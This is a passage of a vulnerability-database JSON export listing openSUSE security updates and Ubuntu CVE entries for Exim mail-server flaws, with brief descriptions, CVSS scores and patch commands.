support for FreeBSD also.\n * Add commandline_checks_require_admin option.\n * Do pipelining under TLS.\n * For the \"sock\" variant of the malware scanner interface, accept an\n empty cmdline element to get the documented default one. Previously\n it was inaccessible.\n * Prevent repeated use of -p/-oMr\n * DKIM: enforce the DNS pubkey record \"h\" permitted-hashes optional\n field, if present.\n * DKIM: when a message has multiple signatures matching an identity\n given in dkim_verify_signers, run the dkim acl once for each.\n * Support IDNA2008.\n * The path option on a pipe transport is now expanded before use\n * Have the EHLO response advertise VRFY, if there is a vrfy ACL defined.\n - Several bug fixes\n - Fix for buffer overflow in base64decode() (boo#1079832 CVE-2018-6789)\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Backports SLE-15-SP1:\n\n zypper in -t patch openSUSE-2021-753=1", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-20T00:00:00", "type": "suse", "title": "Security update for exim (critical)", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000369", "CVE-2017-16943", "CVE-2017-16944", "CVE-2018-6789", "CVE-2019-10149", "CVE-2019-13917", "CVE-2019-15846", "CVE-2019-16928", "CVE-2020-12783", "CVE-2020-28007", "CVE-2020-28008", "CVE-2020-28009", "CVE-2020-28010", "CVE-2020-28011", "CVE-2020-28012", "CVE-2020-28013", "CVE-2020-28014", "CVE-2020-28015", "CVE-2020-28016", "CVE-2020-28017", "CVE-2020-28018", "CVE-2020-28019", "CVE-2020-28020", "CVE-2020-28021", "CVE-2020-28022", "CVE-2020-28023", "CVE-2020-28024", "CVE-2020-28025", "CVE-2020-28026", "CVE-2020-8015"], "modified": "2021-05-20T00:00:00", "id": "OPENSUSE-SU-2021:0753-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/UMX36VOLIS2TDKA3MXOUO365NDUK5WQ3/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-18T12:41:57", "description": "An update that fixes one vulnerability is now available.\n\nDescription:\n\n\n exim was updated to fix a security issue.\n\n - CVE-2019-10149: Fixed a Remote Command Execution in exim (bsc#1136587)\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.1:\n\n zypper in -t patch openSUSE-2019-1524=1\n\n - openSUSE Leap 15.0:\n\n zypper in -t patch openSUSE-2019-1524=1", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-06-07T00:00:00", "type": "suse", "title": "Security update exim (important)", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2019-06-07T00:00:00", "id": "OPENSUSE-SU-2019:1524-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/MSHI6H5JMKAAO5PV4XT32SOANX5LGJM2/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntucve": [{"lastseen": "2023-08-09T16:53:32", "description": "Exim 4 before 4.94.2 has Improper Neutralization of Line Delimiters. An\nauthenticated remote SMTP client can insert newline characters into a spool\nfile (which indirectly leads to remote code execution as root) via AUTH= in\na MAIL FROM command.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[leosilva](<https://launchpad.net/~leosilva>) | fix is same as CVE-2020-28015\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-04T00:00:00", "type": "ubuntucve", "title": "CVE-2020-28021", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28015", "CVE-2020-28021"], "modified": "2021-05-04T00:00:00", "id": "UB:CVE-2020-28021", "href": "https://ubuntu.com/security/CVE-2020-28021", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-08-09T16:52:14", "description": "Exim 4 before 4.94.2 allows Integer Overflow to Buffer Overflow in\nreceive_add_recipient via an e-mail message with fifty million recipients.\nNOTE: remote exploitation may be difficult because of resource consumption.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-04T00:00:00", "type": "ubuntucve", "title": "CVE-2020-28017", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28017"], "modified": "2021-05-04T00:00:00", "id": "UB:CVE-2020-28017", "href": "https://ubuntu.com/security/CVE-2020-28017", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-07T13:45:59", "description": "Exim 4 before 4.94.2 has Improper Initialization that can lead to\nrecursion-based stack consumption or other consequences. This occurs\nbecause use of certain getc functions is mishandled when a client uses BDAT\ninstead of DATA.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[leosilva](<https://launchpad.net/~leosilva>) | trusty/xenial ESM not affected. vulnerability was introduced by: https://git.exim.org/exim.git/patch/7e3ce68e68ab9b8906a637d352993abf361554e2\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-05-04T00:00:00", "type": "ubuntucve", "title": "CVE-2020-28019", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28019"], "modified": "2021-05-04T00:00:00", "id": "UB:CVE-2020-28019", "href": "https://ubuntu.com/security/CVE-2020-28019", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-06-07T13:46:00", "description": "Exim 4 before 4.94.2 allows an off-by-two Out-of-bounds Write because \"-F\n''\" is mishandled by parse_fix_phrase.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-04T00:00:00", "type": "ubuntucve", "title": "CVE-2020-28016", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28016"], "modified": "2021-05-04T00:00:00", "id": "UB:CVE-2020-28016", "href": "https://ubuntu.com/security/CVE-2020-28016", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-09T16:52:44", "description": "Exim 4 before 4.94.2 allows Execution with Unnecessary Privileges. Because\nExim operates as root in the spool directory (owned by a non-root user), an\nattacker can write to a /var/spool/exim4/input spool header file, in which\na crafted recipient address can indirectly lead to command execution.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-04T00:00:00", "type": "ubuntucve", "title": "CVE-2020-28008", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28008"], "modified": "2021-05-04T00:00:00", "id": "UB:CVE-2020-28008", "href": "https://ubuntu.com/security/CVE-2020-28008", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-09T16:51:58", "description": "Exim 4 before 4.94.2 has Improper Neutralization of Line Delimiters,\nrelevant in non-default configurations that enable Delivery Status\nNotification (DSN). Certain uses of ORCPT= can place a newline into a spool\nheader file, and indirectly allow unauthenticated remote attackers to\nexecute arbitrary commands as root.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-04T00:00:00", "type": "ubuntucve", "title": "CVE-2020-28026", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28026"], "modified": "2021-05-04T00:00:00", "id": "UB:CVE-2020-28026", "href": "https://ubuntu.com/security/CVE-2020-28026", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-09T16:52:22", "description": "Exim 4 before 4.94.2 has Improper Neutralization of Line Delimiters. Local\nusers can alter the behavior of root processes because a recipient address\ncan have a newline character.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-04T00:00:00", "type": "ubuntucve", "title": "CVE-2020-28015", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28015"], "modified": "2021-05-04T00:00:00", "id": "UB:CVE-2020-28015", "href": "https://ubuntu.com/security/CVE-2020-28015", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-07T13:46:01", "description": "Exim 4 before 4.94.2 allows Out-of-bounds Write because the main function,\nwhile setuid root, copies the current working directory pathname into a\nbuffer that is too small (on some common platforms).\n\n#### Notes\n\nAuthor| Note \n---|--- \n[leosilva](<https://launchpad.net/~leosilva>) | code introduced later, xenial and trusty ESM not affected\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-04T00:00:00", "type": "ubuntucve", "title": "CVE-2020-28010", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28010"], "modified": "2021-05-04T00:00:00", "id": "UB:CVE-2020-28010", "href": "https://ubuntu.com/security/CVE-2020-28010", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-09T16:55:03", "description": "Exim 4 before 4.92 allows Integer Overflow to Buffer Overflow, in which an\nunauthenticated remote attacker can execute arbitrary code by leveraging\nthe mishandling of continuation lines during header-length restriction.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-04T00:00:00", "type": "ubuntucve", "title": "CVE-2020-28020", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28020"], "modified": "2021-05-04T00:00:00", "id": "UB:CVE-2020-28020", "href": "https://ubuntu.com/security/CVE-2020-28020", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-09T16:52:52", "description": "Exim 4 before 4.94.2 allows Execution with Unnecessary Privileges. The -oP\noption is available to the exim user, and allows a denial of service\nbecause root-owned files can be overwritten.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2021-05-04T00:00:00", "type": "ubuntucve", "title": "CVE-2020-28014", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "PARTIAL", "baseScore": 5.6, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 7.8, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28014"], "modified": "2021-05-04T00:00:00", "id": "UB:CVE-2020-28014", "href": "https://ubuntu.com/security/CVE-2020-28014", "cvss": {"score": 5.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:C"}}, {"lastseen": "2023-08-09T16:52:44", "description": "Exim 4 before 4.94.2 allows Integer Overflow to Buffer Overflow because\nget_stdinput allows unbounded reads that are accompanied by unbounded\nincreases in a certain size variable. NOTE: exploitation may be impractical\nbecause of the execution time needed to overflow (multiple days).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-04T00:00:00", "type": "ubuntucve", "title": "CVE-2020-28009", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28009"], "modified": "2021-05-04T00:00:00", "id": "UB:CVE-2020-28009", "href": "https://ubuntu.com/security/CVE-2020-28009", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-09T16:52:35", "description": "Exim 4 before 4.94.2 allows Heap-based Buffer Overflow in queue_run via two\nsender options: -R and -S. This may cause privilege escalation from exim to\nroot.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-04T00:00:00", "type": "ubuntucve", "title": "CVE-2020-28011", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28011"], "modified": "2021-05-04T00:00:00", "id": "UB:CVE-2020-28011", "href": "https://ubuntu.com/security/CVE-2020-28011", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-07T13:46:01", "description": "Exim 4 before 4.94.2 allows Use After Free in smtp_reset in certain\nsituations that may be common for builds with OpenSSL.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[leosilva](<https://launchpad.net/~leosilva>) | trusty/xenial ESM not affected code introduced later\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-04T00:00:00", "type": "ubuntucve", "title": "CVE-2020-28018", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28018"], "modified": "2021-05-04T00:00:00", "id": "UB:CVE-2020-28018", "href": "https://ubuntu.com/security/CVE-2020-28018", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-09T16:53:12", "description": "Exim 4 before 4.94.2 allows Execution with Unnecessary Privileges. Because\nExim operates as root in the log directory (owned by a non-root user), a\nsymlink or hard link attack allows overwriting critical root-owned files\nanywhere on the filesystem.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-04T00:00:00", "type": "ubuntucve", "title": "CVE-2020-28007", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28007"], "modified": "2021-05-04T00:00:00", "id": "UB:CVE-2020-28007", "href": "https://ubuntu.com/security/CVE-2020-28007", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-09T16:52:06", "description": "Exim 4 before 4.94.2 allows Buffer Underwrite that may result in\nunauthenticated remote attackers executing arbitrary commands, because\nsmtp_ungetc was only intended to push back characters, but can actually\npush back non-character error codes such as EOF.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-04T00:00:00", "type": "ubuntucve", "title": "CVE-2020-28024", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28024"], "modified": "2021-05-04T00:00:00", "id": "UB:CVE-2020-28024", "href": "https://ubuntu.com/security/CVE-2020-28024", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-09T16:55:11", "description": "Exim 4 before 4.94.2 allows Exposure of File Descriptor to Unintended\nControl Sphere because rda_interpret uses a privileged pipe that lacks a\nclose-on-exec flag.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", 